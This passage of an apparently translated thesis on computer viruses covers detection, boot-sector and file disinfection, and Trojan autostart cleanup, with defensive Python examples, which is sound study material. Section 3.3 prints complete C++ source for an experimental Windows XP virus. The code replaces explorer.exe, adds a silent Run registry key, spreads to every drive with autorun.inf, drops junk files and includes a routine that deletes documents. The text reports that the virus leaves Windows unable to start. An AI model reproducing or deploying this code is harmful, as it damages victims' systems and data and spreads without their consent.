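    "BOOT_SECTOR": b"\xEB\x3C\x90MSDOS5.0" + b"\x00" * 499 + b"\x55\xAA",
}


def simulate_infection(objects: Objects) -> Objects:
    """An appending file virus, a boot-sector virus and a dropped Trojan."""
    after = dict(objects)
    after["C:/COMMAND.COM"] = objects["C:/COMMAND.COM"] + b"<virus body>"
    after["BOOT_SECTOR"] = objects["BOOT_SECTOR"][:11] + b"VIRUS" + objects["BOOT_SECTOR"][16:]
    after["C:/WINDOWS/TROJAN.EXE"] = b"MZ\x90\x00dropped"
    return after


def simulate_legitimate_update(objects: Objects) -> Objects:
    """The false-alarm case: the user edits WIN.INI; the checker cannot tell this apart."""
    after = dict(objects)
    after["C:/WINDOWS/WIN.INI"] = b"[windows]\r\nload=\r\nrun=\r\n[Desktop]\r\nWallpaper=(None)\r\n"
    return after


if __name__ == "__main__":
    base = build_baseline(CLEAN, KEY)
    print("clean:    ", verify(CLEAN, base, KEY))
    print("infected: ", verify(simulate_infection(CLEAN), base, KEY))
    print("user edit:", verify(simulate_legitimate_update(CLEAN), base, KEY))
```

The key is what makes the stored value unforgeable; with an unkeyed hash a virus that can read the baseline can simply recompute the entry for the file it changed. Any change, including the user's own edit, is reported the same way, which is the false-alarm problem the text describes.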

2.2.3. Guard (monitoring)

A resident program (TSR) using this method intercepts all disk operations and program executions and warns the user of anything suspicious, such as writes to .EXE or .COM files or direct writes to the boot area of the disk. However, this method cannot catch boot viruses that use BIOS functions to access the disk, because those viruses are loaded before the guard runs: they hook the BIOS disk functions first, so guard programs cannot control them. Guard programs also raise false alarms when applications legitimately write to .EXE or .COM files, for example during compression, copy protection or software installation. In general, programs of this kind slow the system down.

Chapter 3. VIRUS PREVENTION AND REMOVAL

3.1. SCANNING MEMORY
This is the most important step for everything that follows, since no cure is possible without knowing whether the system is infected and with which virus. The search must first be carried out in memory, because once a resident virus has taken control of the system it will distort the information returned by subsequent disk operations. Only afterwards is the disk examined. The presence of a virus goes hand in hand with a few particular signs. For macro viruses and TF-viruses, scanning memory is unnecessary and can be skipped; for B-viruses and RF-viruses it is essential. The search covers both predicting the possible presence of a new virus and precisely identifying known viruses in memory. Scanning memory proceeds in the following steps.

1/. For B-viruses:
Compare the total memory reported by the BIOS with the total memory the program can actually read after testing it, to find any discrepancy. A memory discrepancy alone does not prove a virus: it is the basis for the second step, since the shortfall may be caused by an ordinary program or by partly defective RAM. Starting from the address of the high memory region, search high memory with the scanning technique for characteristic virus code. Any hit allows us to conclude that a virus is in memory. If nothing is found, a new B-virus may still be present: if memory is short, INT 13h points into the missing region, and that region contains dangerous code, we can conclude that a B-virus is present.

2/. For RF-viruses:
The scanning technique can be used to search for characteristic virus code from low to high addresses, or the interrupt-call method can be used to trigger the self-recognition code that viruses install so as to recognise themselves in memory. If nothing is found, a new RF-virus may still exist; if INT 21h points to a memory region containing dangerous code, concluding that a new RF-virus is present is fairly reliable.

Scanning the disk
The disk is scanned only after memory has been checked and found clean, or after any virus found there has been neutralised. Like most antivirus programs, this program uses the method of scanning for characteristic code fragments to detect viruses. First the boot area is scanned for B-viruses, then files are scanned for F-viruses, Trojans and worms. To scan the boot area, INT 13h function 02h (read sector) of the BIOS reads it into a buffer and the buffer is scanned for characteristic virus code. To scan files, the file functions of INT 21h are used: function 3Dh opens the file, then function 3Fh reads it into a buffer, which is scanned in the same way.

3.2. REMOVING VIRUSES AND RESTORING DATA

Before removing a virus from disk while it is still resident in memory, the program neutralises the virus in memory if necessary and possible. Nevertheless, rebooting from a clean system disk before disinfecting remains the safest approach.

3.2.1. B-Virus
Many people think that removing the virus and restoring the disk is simply a matter of writing a clean boot sector over the old, infected one. However, if the disk's boot sector has a special job this is very hard to do, not to mention that the disk has a parameter table which, if the virus has altered it even slightly, leaves the disk uncontrollable (overwriting is reasonable only if the clean boot sector is the disk's own boot sector, saved earlier). So the best approach is to restore the boot sector, and only when it cannot be restored to write a clean one. The steps are:
- Based on the disk type (hard or floppy) and the virus type, decode the virus to determine where it stashed the original boot sector.
- Read the original boot sector into a buffer with BIOS interrupt 13h (read-sector function 02h) and check that it is valid.
- Only if that check passes, write it over the infected boot sector with BIOS interrupt 13h, write-sector function 03h.
For DB-Viruses, restoring the disk may also involve freeing clusters the virus marked on the disk, if it used the FAT-locating method. The best way to handle this is to do what the virus did, but in reverse.
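The three steps above as an added worked example in Python; this code is not from the thesis. The 8-sector in-memory image, the stash location (sector 5) and the particular BPB sanity checks are assumptions made for the example, and read_sector/write_sector stand in for INT 13h functions 02h and 03h. The point it shows is the "validate before writing" step: a damaged stash is rejected and sector 0 is left untouched.

```python
import struct

SECTOR_SIZE = 512


def read_sector(disk: bytearray, lba: int) -> bytes:
    """Stand-in for BIOS INT 13h function 02h (read sector) on an in-memory image."""
    off = lba * SECTOR_SIZE
    return bytes(disk[off:off + SECTOR_SIZE])


def write_sector(disk: bytearray, lba: int, data: bytes) -> None:
    """Stand-in for BIOS INT 13h function 03h (write sector)."""
    if len(data) != SECTOR_SIZE:
        raise ValueError("sector must be exactly 512 bytes")
    off = lba * SECTOR_SIZE
    disk[off:off + SECTOR_SIZE] = data


def is_valid_boot_sector(sec: bytes) -> bool:
    """Checks a recovered DOS boot sector before it is written over the infected one:
    boot signature, a jump over the BPB, and BPB fields that are plausible."""
    if len(sec) != SECTOR_SIZE or sec[510:512] != b"\x55\xAA":
        return False
    short_jmp = sec[0] == 0xEB and sec[2] == 0x90
    near_jmp = sec[0] == 0xE9
    if not (short_jmp or near_jmp):
        return False
    (bytes_per_sector, sectors_per_cluster, reserved,
     fats, _root_entries, _total_sectors, media) = struct.unpack_from("<HBHBHHB", sec, 11)
    if bytes_per_sector not in (512, 1024, 2048, 4096):
        return False
    if sectors_per_cluster not in (1, 2, 4, 8, 16, 32, 64, 128):
        return False
    if reserved < 1 or fats not in (1, 2):
        return False
    if media != 0xF0 and media < 0xF8:
        return False
    return True


def restore_boot_sector(disk: bytearray, stash_lba: int) -> bool:
    """Steps 2 and 3 of the procedure: read the stashed original, validate it, and only
    then write it back to sector 0. Returns False (disk untouched) on failure."""
    original = read_sector(disk, stash_lba)
    if not is_valid_boot_sector(original):
        return False
    write_sector(disk, 0, original)
    return True


# ---- constructed sample disk (an assumption of this example, not thesis data) ----

def make_boot_sector(code: bytes) -> bytes:
    """Builds a FAT12 1.44 MB style boot sector carrying the given fake boot code."""
    sec = bytearray(SECTOR_SIZE)
    sec[0:3] = b"\xEB\x3C\x90"          # JMP 0x3E ; NOP
    sec[3:11] = b"MSDOS5.0"
    struct.pack_into("<HBHBHHB", sec, 11, 512, 1, 1, 2, 224, 2880, 0xF0)
    sec[62:62 + len(code)] = code
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


def build_infected_disk(stash_lba: int = 5, corrupt_stash: bool = False):
    """8-sector image: sector 0 holds the virus's boot sector; the original is stashed
    at stash_lba (where a real virus keeps it is virus-specific; 5 is assumed here)."""
    disk = bytearray(8 * SECTOR_SIZE)
    original = make_boot_sector(b"ORIGINAL-BOOT-CODE")
    write_sector(disk, 0, make_boot_sector(b"VIRUS-BOOT-CODE"))
    stash = bytearray(original)
    if corrupt_stash:
        stash[510:512] = b"\x00\x00"     # simulate a damaged stash
    write_sector(disk, stash_lba, bytes(stash))
    return disk, original


if __name__ == "__main__":
    disk, original = build_infected_disk()
    print("restored:", restore_boot_sector(disk, 5), read_sector(disk, 0) == original)
    disk, _ = build_infected_disk(corrupt_stash=True)
    print("restored from damaged stash:", restore_boot_sector(disk, 5))
```

The BPB checks are deliberately conservative: a sector that fails them is exactly the "parameter table altered slightly" case the text warns about, and writing it back would leave the disk in a state DOS cannot control.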

3.2.2. F-Virus

1/. Macro viruses:


Removal simply means deleting the virus's macros (using function 040h of interrupt 21h).

2/. Traditional F-Viruses:


Decode the virus to recover the program data it holds, then cut the virus code out of the program.

3/. For .COM and .BIN files:


If the virus infects by appending to the file: put back the leading bytes the virus took over, move the file pointer to the start of the virus code (function 042h of interrupt 21h) and then cut it off the file with the DOS write-file function 040h of interrupt 21h. If the virus infects by prepending: read the file from just after the virus code into memory with read-file function 03Fh of interrupt 21h, then write it back out (function 040h of interrupt 21h). If the virus infects by filling empty space in the file: locate and put back the leading bytes the virus took over, move the file pointer to the virus code and erase it.


4/. For .EXE files:


Removal is similar to the .COM case. If the virus stores the file's old EXE header, restoration is simply a matter of giving that part back to the file; otherwise some fields of the EXE header must be computed and located: the .EXE identification mark MZ, the total number of pages, and the number of odd bytes in the file's last page.
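The .COM and .EXE cases of items 3/ and 4/ above, as an added worked example in Python; this is not code from the thesis. It models one appending infector whose body layout, signature FAKEVIRUS, and habit of stashing the first 3 bytes of a COM file or the 28-byte MZ header of an EXE file are assumptions made for the example; a real disinfector needs the corresponding facts for each virus. Truncation and header rewriting are done on byte strings rather than through DOS interrupt 21h. The fallback fix_exe_size_fields covers the second case in the text, where only the MZ mark, total pages and bytes-in-last-page are recomputed.

```python
import struct

# 28-byte MZ header: e_magic, e_cblp, e_cp, e_crlc, e_cparhdr, e_minalloc, e_maxalloc,
# e_ss, e_sp, e_csum, e_ip, e_cs, e_lfarlc, e_ovno
MZ_HEADER = struct.Struct("<2s13H")
VIRUS_MARK = b"FAKEVIRUS"   # constructed signature of the modelled virus body


def infect_com(original: bytes) -> bytes:
    """Models an appending COM infector (constructed for this example): the first 3 bytes
    are saved inside the virus body and replaced by a JMP rel16 to the body."""
    body = VIRUS_MARK + original[:3]
    rel = len(original) - 3              # JMP is relative to the byte after the instruction
    return b"\xE9" + struct.pack("<H", rel) + original[3:] + body


def disinfect_com(infected: bytes) -> bytes:
    """Put the saved 3 bytes back and truncate the file at the start of the virus."""
    if infected[0] != 0xE9:
        raise ValueError("entry is not a JMP rel16; not this infection type")
    virus_start = struct.unpack_from("<H", infected, 1)[0] + 3
    body = infected[virus_start:]
    if not body.startswith(VIRUS_MARK):
        raise ValueError("virus signature not found at the jump target")
    saved = body[len(VIRUS_MARK):len(VIRUS_MARK) + 3]
    return saved + infected[3:virus_start]


def infect_exe(original: bytes) -> bytes:
    """Models an appending EXE infector (constructed): saves the 28-byte header in its
    body, appends itself, points CS:IP at the body and fixes e_cp/e_cblp."""
    hdr = list(MZ_HEADER.unpack_from(original, 0))
    header_bytes = hdr[4] * 16           # e_cparhdr is in 16-byte paragraphs
    body = VIRUS_MARK + original[:MZ_HEADER.size]
    new_len = len(original) + len(body)
    entry = len(original) - header_bytes  # virus offset within the load image
    hdr[1] = new_len % 512               # e_cblp: bytes in last page (0 = full page)
    hdr[2] = (new_len + 511) // 512      # e_cp: total pages
    hdr[10] = entry % 16                 # e_ip
    hdr[11] = entry // 16                # e_cs
    return MZ_HEADER.pack(*hdr) + original[MZ_HEADER.size:] + body


def disinfect_exe(infected: bytes) -> bytes:
    """First case in the text: the virus kept the old header, so put it back and truncate."""
    hdr = MZ_HEADER.unpack_from(infected, 0)
    if hdr[0] != b"MZ":
        raise ValueError("not an MZ executable")
    virus_off = hdr[4] * 16 + hdr[11] * 16 + hdr[10]   # file offset of CS:IP
    body = infected[virus_off:]
    if not body.startswith(VIRUS_MARK):
        raise ValueError("virus signature not found at the entry point")
    saved_header = body[len(VIRUS_MARK):len(VIRUS_MARK) + MZ_HEADER.size]
    if saved_header[:2] != b"MZ":
        raise ValueError("stashed header is damaged; use fix_exe_size_fields instead")
    return saved_header + infected[MZ_HEADER.size:virus_off]


def fix_exe_size_fields(data: bytes) -> bytes:
    """Second case in the text: no usable stashed header, so recompute total pages and
    bytes-in-last-page from the truncated file. CS:IP and SS:SP are NOT recovered here;
    they must come from wherever the specific virus stored them."""
    hdr = list(MZ_HEADER.unpack_from(data, 0))
    hdr[1] = len(data) % 512
    hdr[2] = (len(data) + 511) // 512
    return MZ_HEADER.pack(*hdr) + data[MZ_HEADER.size:]


def exe_size_fields(data: bytes) -> tuple:
    """(e_cp, e_cblp) of an MZ file, for checking the repair."""
    hdr = MZ_HEADER.unpack_from(data, 0)
    return hdr[2], hdr[1]


# ---- constructed sample programs (assumptions of this example) ----

def make_sample_com() -> bytes:
    return b"\xB4\x09\xBA" + b"ORIGINAL-COM-PROGRAM" + b"\xCD\x21\xC3"


def make_sample_exe() -> bytes:
    code = b"ORIGINAL-EXE-CODE".ljust(100, b"\x90")
    total = 32 + len(code)               # 2-paragraph header (28 bytes + 4 padding) + code
    hdr = MZ_HEADER.pack(b"MZ", total % 512, (total + 511) // 512, 0, 2,
                         0, 0xFFFF, 0, 0x100, 0, 0, 0, 0x1C, 0)
    return hdr + b"\x00" * 4 + code


if __name__ == "__main__":
    com = make_sample_com()
    print("COM restored:", disinfect_com(infect_com(com)) == com)
    exe = make_sample_exe()
    infected = infect_exe(exe)
    print("EXE restored:", disinfect_exe(infected) == exe)
    print("size fields after truncation:", exe_size_fields(fix_exe_size_fields(infected[:len(exe)])))
```

Both disinfectors refuse to touch a file whose entry point does not lead to the expected signature; a disinfector that cuts at a guessed offset is as destructive as the virus.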

3.2.3. Trojans


A Trojan only infects the computer; it does not infect the files on the computer. So when removing a Trojan we need not worry about whether copies of it are active in the system. A Trojan has the property that, to do anything, it must first be activated, so an effective way to defeat it is to prevent it from being activated. To remove a Trojan in this way we must know the methods a Trojan can use to get itself activated. Some methods Trojans commonly use to be activated (the example start-up file here is Trojan.exe):
- In the folders whose files are run when Windows starts: C:\Windows\Start Menu\Programs\startup\Trojan.exe
- In the file C:\windows\Win.ini, on the line Load=Trojan.exe or run=Trojan.exe
- In the file c:\windows\system.ini, after the shell command Shell=Explorer.exe, so that it is run with the shell
- In Autoexec.bat: C:\....\Trojan.exe
- In the Windows start-up folder: C:\ \Trojan.exe
- By creating keys in the Registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] Trojan=c:\\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] Trojan=c:\...\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Run] Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\RunServices] Trojan=c:\....\Trojan.exe
- In the Registry shell open command, whose value is %1%*:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_CLASSES_ROOT\comfile\shell\open\command]
[HKEY_CLASSES_ROOT\batfile\shell\open\command]
[HKEY_CLASSES_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
Trojan.exe = %1%*
- In some applications that allow programs to be run:
+ In ICQ: [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
+ In ActiveX: [HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName] StubPath=c:\...\Trojan.exe
To remove the Trojan, delete every command that would run the Trojan file when the computer starts (here, the example file Trojan.exe).
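An added example, not from the thesis, that audits the start-up locations listed above on a snapshot of a machine: win.ini load=/run=, the system.ini shell= line, autoexec.bat, the Run-family registry keys, the shell\open\command hijack, and the Startup folder. The win.ini, system.ini, autoexec.bat text, the registry dictionary and the folder listing are all constructed sample data for this example; on a real machine they would be read from the files and the registry. The audit lists every autostart entry and then filters the ones that reference the file being hunted, so a legitimate entry such as SysTray.Exe is reported but not flagged.

```python
import configparser
import ntpath

RUN_KEYS = {"run", "runonce", "runservices", "runservicesonce"}
DEFAULT_SHELL_OPEN = '"%1" %*'

# ---- constructed sample state of a Windows 9x/XP machine (not a real capture) ----
WIN_INI = """[windows]
load=Trojan.exe
run=
NullPort=None
"""

SYSTEM_INI = """[boot]
shell=Explorer.exe Trojan.exe
mouse.drv=mouse.drv
"""

AUTOEXEC_BAT = """@ECHO OFF
PATH C:\\WINDOWS;C:\\WINDOWS\\COMMAND
C:\\WINDOWS\\TEMP\\Trojan.exe
"""

REGISTRY = {
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run": {
        "SystemTray": "SysTray.Exe",
        "Trojan": r"c:\windows\Trojan.exe",
    },
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run": {},
    r"HKEY_CLASSES_ROOT\exefile\shell\open\command": {"": r'"C:\windows\Trojan.exe" "%1" %*'},
    r"HKEY_CLASSES_ROOT\comfile\shell\open\command": {"": DEFAULT_SHELL_OPEN},
}

STARTUP_FOLDER = ["Office Startup.lnk", "Trojan.exe"]


def ini_entries(text, fname, section, keys):
    """Non-empty values of the given keys (e.g. load=/run= in [windows] of win.ini)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    out = []
    for key in keys:
        if cp.has_option(section, key) and cp.get(section, key).strip():
            out.append((f"{fname} [{section}] {key}", cp.get(section, key).strip()))
    return out


def autoexec_commands(text):
    """Lines of autoexec.bat whose first word is a program (.exe/.com/.bat)."""
    cmds = []
    for line in text.splitlines():
        words = line.strip().replace('"', " ").split()
        if words and ntpath.splitext(words[0])[1].lower() in (".exe", ".com", ".bat"):
            cmds.append(line.strip())
    return cmds


def shell_open_hijacks(registry):
    """shell\\open\\command keys whose default value is not the plain "%1" %*."""
    return [key for key, values in registry.items()
            if key.lower().endswith(r"\shell\open\command")
            and values.get("", "").strip() != DEFAULT_SHELL_OPEN]


def collect_autostarts(win_ini, system_ini, autoexec, registry, startup_folder):
    """Every place listed in the text where a program can be launched at start-up."""
    entries = list(ini_entries(win_ini, "win.ini", "windows", ("load", "run")))
    for src, val in ini_entries(system_ini, "system.ini", "boot", ("shell",)):
        if val.lower() != "explorer.exe":          # anything beyond the default shell
            entries.append((src, val))
    entries += [("autoexec.bat", cmd) for cmd in autoexec_commands(autoexec)]
    for key, values in registry.items():
        leaf = key.rsplit("\\", 1)[-1]
        if leaf.lower() in RUN_KEYS:
            entries += [(f"registry {leaf}: {name}", cmd) for name, cmd in values.items()]
    for key in shell_open_hijacks(registry):
        entries.append((f"registry {key}", registry[key][""]))
    entries += [("Startup folder", name) for name in startup_folder]
    return entries


def entries_referencing(entries, exe_name):
    """Autostart entries whose command mentions the given file (basename match)."""
    target = exe_name.lower()
    hits = []
    for src, cmd in entries:
        names = {ntpath.basename(tok).lower() for tok in cmd.replace('"', " ").split()}
        if target in names:
            hits.append((src, cmd))
    return hits


if __name__ == "__main__":
    found = collect_autostarts(WIN_INI, SYSTEM_INI, AUTOEXEC_BAT, REGISTRY, STARTUP_FOLDER)
    for src, cmd in entries_referencing(found, "Trojan.exe"):
        print(f"remove from {src}: {cmd}")
```

The shell\open\command check matters more than the others when cleaning up: if that value is deleted instead of restored to "%1" %*, no .exe will start at all, which is the same outcome the Trojan's author would get by breaking the system.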


3.2.4. Worms
To remove an Internet worm, the following steps are carried out in turn:
- Research the information about the worm.
- Remove the infecting part from the infected files.
Each Internet worm has its own characteristics, so it is necessary to research the worm: the name of its executable file, the path of that file, its effects on other files in the system, the files it creates, and the representative code of the worm. Using the worm's representative code, files can be scanned to find and remove that worm.
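The signature scanning described in 3.1 (memory shortfall check, boot-sector scan, file scan) and relied on again here for worms, as one added worked example in Python; this is not code from the thesis. The signatures, written as hex with ?? wildcards, the sample boot sector and the sample files are all constructed for the example and are not real virus patterns; memory_shortfall_kb takes the BIOS-reported figure as a number rather than calling INT 12h.

```python
import re

# Constructed signatures for this example, not real virus patterns.
SIGNATURES = {
    "Sample-Boot": "B8 ?? ?? 8E D8 FA BC 00 7C",   # shape of a boot-loader prologue
    "Sample-File": "E8 00 00 5E 81 EE ?? ?? 50",   # CALL $+3 / POP SI delta trick
    "Sample-Worm": "57 4F 52 4D 2D 4D 41 52 4B",   # the ASCII text "WORM-MARK"
}


def compile_signature(hex_pattern: str):
    """Turns 'B8 ?? 7C' into a bytes regex where ?? matches any single byte."""
    parts = []
    for tok in hex_pattern.split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_signature(p) for name, p in SIGNATURES.items()}


def scan_buffer(buf: bytes, sigs=None) -> list:
    """Returns [(signature name, offset)] for every match in the buffer, by offset."""
    sigs = COMPILED if sigs is None else sigs
    hits = []
    for name, rx in sigs.items():
        for m in rx.finditer(buf):
            hits.append((name, m.start()))
    return sorted(hits, key=lambda h: h[1])


def scan_boot_sector(sector: bytes) -> list:
    """What the text does after INT 13h/02h: scan the sector read into a buffer."""
    if len(sector) != 512:
        raise ValueError("a boot sector is 512 bytes")
    return scan_buffer(sector)


def scan_file(data: bytes) -> list:
    """What the text does after INT 21h/3Dh + 3Fh: scan the file contents."""
    return scan_buffer(data)


def memory_shortfall_kb(bios_reported_kb: int, expected_kb: int = 640) -> int:
    """Step 1 for B-Viruses: how much conventional memory has 'disappeared'.
    A non-zero value is a lead to scan the high region, not proof of a virus."""
    return max(0, expected_kb - bios_reported_kb)


# ---- constructed samples (assumptions of this example) ----

def make_sample_boot_sector() -> bytes:
    sec = bytearray(512)
    sec[0:3] = b"\xEB\x3C\x90"
    sec[0x3E:0x3E + 9] = bytes.fromhex("B8 00 7C 8E D8 FA BC 00 7C")
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


SAMPLE_INFECTED_FILE = (b"MZ" + b"\x90" * 8
                        + bytes.fromhex("E8 00 00 5E 81 EE 03 01 50") + b"\xC3" * 16)
SAMPLE_CLEAN_FILE = b"MZ" + b"\x90" * 64


if __name__ == "__main__":
    print("memory shortfall:", memory_shortfall_kb(638), "KB")
    print("boot sector:", scan_boot_sector(make_sample_boot_sector()))
    print("files:", scan_file(SAMPLE_INFECTED_FILE), scan_file(SAMPLE_CLEAN_FILE))
```

The wildcard bytes are what let one signature cover variants that differ only in an address or displacement, which is the usual reason a pure byte-for-byte match misses a sample.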


3.3. CREATING A COMPUTER VIRUS


An experimental computer virus program written in Visual C++ and run on Windows XP. The virus program:

Declarations

#include "stdafx.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <process.h>
#include <io.h>

#define SVCHOST_NUM 6
#define RUBBISH_NUM 5
#define REMOVE_NUM 5

/*=================================================*/
/* autorun.inf text dropped next to each copy so that opening the drive runs SVCHOST.com */
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=(&O)\\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=(&X)\\nshell\\explore\\Command=\"SVCHOST.com /s\""};
/*=================================================*/
/* .reg text adding a Run key so that wjview32.com starts with Windows */
char *regadd={"REGEDIT4\n\n\
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32\\"=\"C:\\\\windows\\\\wjview32.com /s\""};

/*=================================================*/
/* byte-by-byte file copy; returns 0 on success, 1 if either file cannot be opened */
int copy(char *infile,char *outfile)
{
    FILE *input,*output;
    char temp;
    if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL))
    {
        while(!feof(input))
        {
            fread(&temp,1,1,input);
            fwrite(&temp,1,1,output);
        }
        fclose(input);
        fclose(output);
        return 0;
    }
    else
        return 1;
}

/*=================================================*/
/* moves the real explorer.exe aside (to $temp$) and puts a copy of SVCHOST.com in its place */
int autorun_explorer()
{
    FILE *input;
    if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL)
    {
        fclose(input);
        remove("C:\\windows\\$temp$");
        remove("C:\\windows\\system32\\dllcache\\$temp$");
        return 1;
    }
    copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
    rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$");
    rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\system32\\dllcache\\$temp$");
    if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0)
        return 0;
    else
        return 2;
}

/*=================================================*/
/* writes the .reg text to a temporary file and imports it silently with regedit /s */
int add_reg()
{
    FILE *output;
    if((output=fopen("$$$$$","w"))!=NULL)
    {
        fprintf(output,regadd);
        fclose(output);
        spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL);
        return 0;
    }
    return 1;
}
/*=================================================*/

/* copies the first existing copy over all the other file names, then onto every drive
   letter from C: to Z: together with an autorun.inf */
void copy_virus()
{
    int i,k;
    FILE *input,*output;
    char *files_svchost[SVCHOST_NUM]={"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\system32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
    char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};

    for(i=0;i<SVCHOST_NUM;i++)
    {
        if((input=fopen(files_svchost[i],"rb"))!=NULL)
        {
            fclose(input);
            for(k=0;k<SVCHOST_NUM;k++)
            {
                copy(files_svchost[i],files_svchost[k]);
            }
            i=SVCHOST_NUM;
        }
    }
    for(i=0;i<SVCHOST_NUM;i++)
    {
        if((input=fopen(files_svchost[i],"rb"))!=NULL)
        {
            fclose(input);
            for(k=0;k<24;k++)
            {
                copy(files_svchost[i],temp[0]);
                if((output=fopen(temp[1],"w"))!=NULL)
                {
                    fprintf(output,"%s",autorun);
                    fclose(output);
                }
                temp[0][0]++;
                temp[1][0]++;
            }
            i=SVCHOST_NUM;
        }
    }
}
/*=================================================*/

/* drops RUBBISH_NUM junk files with pseudo-random names on C: */
void make_rubbish()
{
    int i;
    FILE *output;
    srand(0);
    for(i=0;i<RUBBISH_NUM;i++)
    {
        int n;
        char s[30];
        n=rand();
        sprintf(s,"C:\\DESTORY_GHIDE_%d",n);
        if((output=fopen(s,"w"))!=NULL)
        {
            fprintf(output,"%ld%s",n*n,s);
            fclose(output);
        }
    }
}
/*================================================*/

/* deletes *.txt, *.doc and *.xls in the current directory (not called from WinMain below) */
void remove_files()
{
    long done;
    int i;
    struct _finddata_t ffblk;
    char *remove_files[3]={"*.txt","*.doc","*.xls"};
    for(i=0;i<3;i++)
    {
        if(_findfirst(remove_files[i],&ffblk)==-1)
            continue;
        while(!done)
        {
            remove(ffblk.name);
            _findnext(done,&ffblk);
        }
        _findclose(done);
    }
}
/*=================================================*/

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    int contral=0;
    autorun_explorer();
    spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL);
    add_reg();
    copy_virus();
    make_rubbish();
    spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
    return 0;
}

Drive C: before running the virus


After the program is run, the Win32 virus automatically creates and deletes the following files. Once the program built with Visual C++ has run, it tampers with several Windows files, which makes Windows XP fail at start-up:
CreateFile C:\windows\system32\dllcache\$temp$
DeleteFile C:\windows\system32\dllcache\explorer.exe
CreateFile C:\windows\$temp$
DeleteFile C:\windows\explorer.exe
CreateFile C:\windows\system\explorer.exe

Drive C: after running the virus
After this virus program has run and the computer is restarted, the desktop no longer comes up, because the file C:\windows\system\explorer.exe has been changed and the files C:\windows\system32\dllcache\$temp$ and C:\windows\$temp$ have been created, so Windows XP cannot load the program that starts the Windows XP desktop.

The screen shows neither the taskbar nor the folders
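The file-operation trace reported above is the kind of evidence a monitor can turn into an alert. The following added example, which is not code from the thesis, runs three simple rules over a trace constructed after the one in the text (the trace lines, the extra benign and dropper lines, and the rule thresholds are assumptions of the example): a create or delete of explorer.exe anywhere, any write under C:\windows, and a dropper (autorun.inf or svchost.com) appearing on a drive root.

```python
import ntpath

# Trace constructed after the one reported in the text; not a real capture.
TRACE = """CreateFile C:\\windows\\system32\\dllcache\\$temp$
DeleteFile C:\\windows\\system32\\dllcache\\explorer.exe
CreateFile C:\\windows\\$temp$
DeleteFile C:\\windows\\explorer.exe
CreateFile C:\\windows\\system\\explorer.exe
CreateFile C:\\Documents and Settings\\user\\report.doc
CreateFile C:\\svchost.com
CreateFile C:\\autorun.inf
"""

SHELL_BINARIES = {"explorer.exe"}
PROTECTED_DIRS = (r"c:\windows",)            # system and system32\dllcache sit below it
ROOT_DROPPERS = {"autorun.inf", "svchost.com"}


def under(folder: str, root: str) -> bool:
    """True if folder is root itself or lies below it (exact path components)."""
    return folder == root or folder.startswith(root + "\\")


def classify(op: str, path: str):
    """Tags one file operation with the behaviour it matches, or None if benign."""
    p = path.lower()
    name = ntpath.basename(p)
    folder = ntpath.dirname(p)
    if name in SHELL_BINARIES and op in ("CreateFile", "DeleteFile"):
        return "shell-binary-replaced"       # explorer.exe being swapped out
    if any(under(folder, d) for d in PROTECTED_DIRS):
        return "write-in-windows-dir"        # e.g. the $temp$ rename targets
    if p.count("\\") == 1 and name in ROOT_DROPPERS:
        return "drive-root-dropper"          # autorun.inf / svchost.com on the root
    return None


def scan_trace(text: str) -> list:
    """Parses 'Op Path' lines and returns [(op, path, tag)] for every alert."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        op, path = line.strip().split(" ", 1)
        tag = classify(op, path)
        if tag:
            alerts.append((op, path, tag))
    return alerts


if __name__ == "__main__":
    for op, path, tag in scan_trace(TRACE):
        print(f"{tag:24} {op} {path}")
```

The first rule alone would have caught this sample at the second line of the trace, before the original explorer.exe was lost; the point of the other two is that they fire on the program's side effects even when the shell-replacement step fails.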


Conclusion
Results achieved by the thesis:

1. Study and research of the theory:
- An overview of computer viruses and the operation of B-Viruses, F-Viruses, macro viruses, Trojans and Internet worms.
- Some methods for detecting and identifying computer viruses.
- Some methods for preventing and removing computer viruses.
